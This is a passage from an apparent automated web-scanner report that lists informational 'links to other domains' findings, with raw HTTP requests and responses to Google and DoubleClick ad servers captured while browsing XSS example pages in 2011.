GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7149
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:56:48 GMT
Expires: Sat, 02 Apr 2011 12:56:48 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Jan 06 11:17:25 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/free-easy-webex-together.html%3FTrackID%3D1024048"><img src="http://s0.2mdn.net/2830766/cisco_webex_Simple_AllText_728x90_r1.gif" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

19.2. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /activityi;src=2178764;type=newkc987;cat=kcomh345;ord=1;num=2714251752477.139? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; BE_CLA=p_id%3D2L8PRN68LAAPR28ANNL404NJ22AH628422%26p_last_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26s_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26p_first_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26p_first_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26s_expire%3D1300726794236%26s_id%3DJL8PRN68LAAPRJP844P404NJ22AH628422; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 02 Apr 2011 13:57:06 GMT
Expires: Sat, 02 Apr 2011 13:57:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1088

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start of Standard Pixel Code -->
<img src="http://smp.adviva.net/track/v=4;m=1;t=7841;ts=<timestamp_here>" width="0" height="1" border="0" />
<!-- End of Standard Pixel Code -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1012592563/?label=n4a6CNXI7wEQs9_r4gM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

19.3. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /activityi;src=2178764;type=newkc987;cat=conta959;ord=1;num=5709919489454.478? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; BE_CLA=p_id%3D2L8PRN68LAAPR28ANNL404NJ22AH628422%26p_last_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26s_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26p_first_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26p_first_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26s_expire%3D1300726794236%26s_id%3DJL8PRN68LAAPRJP844P404NJ22AH628422; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 02 Apr 2011 13:57:18 GMT
Expires: Sat, 02 Apr 2011 13:57:18 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1085

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start of Standard Pixel Code -->
<img src="http://smp.adviva.net/track/v=4;m=1;t=7842;ts=<timestamp_here>" width="0" height="1" border="0" />
<!-- End of Standard Pixel Code -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1012592563/?label=7tKGCO3F7wEQs9_r4gM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

19.4. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998814&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fbody.aol.com.html&dt=1301749206467&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749206485&frm=0&adk=1607234649&ga_vid=700876947.1301749206&ga_sid=1301749206&ga_hid=27150066&ga_fc=0&u_tz=-300&u_his=35&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=23&xpc=qMw2oFkjxX&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:30 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4287

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/body.aol.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.alot.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFSGoTASL1g_jhS_a52tAE9zZOFmg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.5. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-sso-xss.login.openx.org.html&dt=1301748315620&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748315625&frm=0&adk=1607234649&ga_vid=372530300.1301748316&ga_sid=1301748316&ga_hid=411579572&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=10&xpc=nI0nZrRtQ4&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:44:39 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4027

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cross-site-scripting-sso-xss.login.openx.org.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.vistaprint.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHhwlYpkGNoxnoLqjNe-7UsQl9sPw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.6. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-xss-cross-site-scripting-snas.nbcuni.com.html&dt=1301749112718&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749112730&frm=0&adk=1607234649&ga_vid=136358445.1301749113&ga_sid=1301749113&ga_hid=360555884&ga_fc=0&u_tz=-300&u_his=27&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=17&xpc=0AG2DbiWvO&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:56 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12509

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capec-86-xss-cross-site-scripting-snas.nbcuni.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26adU%3Dwww.MuleSoft.com/Free_Download%26adT%3DDownload%2BTcat%2BServer%26adU%3Dwww.gosoftchoice.com/IBMAppScan%26adT%3DVulnerability%2BTool%26gl%3DUS&amp;usg=AFQjCNF3APsizVDBN9USKEGfXH82za-EYQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.7. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766310&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcross-site-scripting-sso-xss.login.openx.org.html&dt=1301748310547&bpp=9&shv=r20110324&jsv=r20110321-2&correlator=1301748310558&frm=0&adk=1607234649&ga_vid=1437402810.1301748311&ga_sid=1301748311&ga_hid=1169626367&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=CsHHt2H3Hu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:44:34 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4635

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k">
...[SNIP]...
APiBfUDAAAAxA%26num%3D1%26sig%3DAGiWqtxaOyaXZf9xjeuiOHLlrTRLmW800w%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB4SAHMhqXTaunCouBlgf52eSUCdbuheEBnru7zhGWk9-WSYCJehABGAEgvs7lDTgAUI3b18UEYMkGoAHu8sn5A7oBCTcyOHg5MF9hc8gBBNoBTmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctc3NvLXhzcy5sb2dpbi5vcGVueC5vcmcuaHRtbIACAbgCGMACBcgC7uS2FKgDAegD3AXoA7oC6APiBfUDAAAAxA%26num%3D1%26sig%3DAGiWqtxaOyaXZf9xjeuiOHLlrTRLmW800w%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cross-site-scripting-sso-xss.login.openx.org.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHMFVCzeB416yDiAw2gahb5FaWd8g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.8. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766814&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748814153&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748814161&frm=0&adk=1607234649&ga_vid=383323215.1301748814&ga_sid=1301748814&ga_hid=1924418977&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=13&xpc=Sgp5LVOPWN&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:52:58 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12355

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cross-site-scripting-xss.www.courchevel.com.html%26hl%3Dfr%26client%3Dca-pub-4063878933780912%26adU%3Dwww.booking.com%26adT%3DH%25C3%25B4tels%2B%25C3%25A0%2BCourchevel%26adU%3DFrontRange.com/Discovery%26adT%3DNetwork%2BDiscover%2BSoftware%26adU%3Dwww.virtualinstruments.com%26adT%3DSAN%2BI/O%2BPerformance%26gl%3DUS&amp;usg=AFQjCNEd84H5un3u38VPLiSpL43U9MzsYQ" target=_blank><img alt="Annonces Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-fr-100c-000000.png" width=91></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.9. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

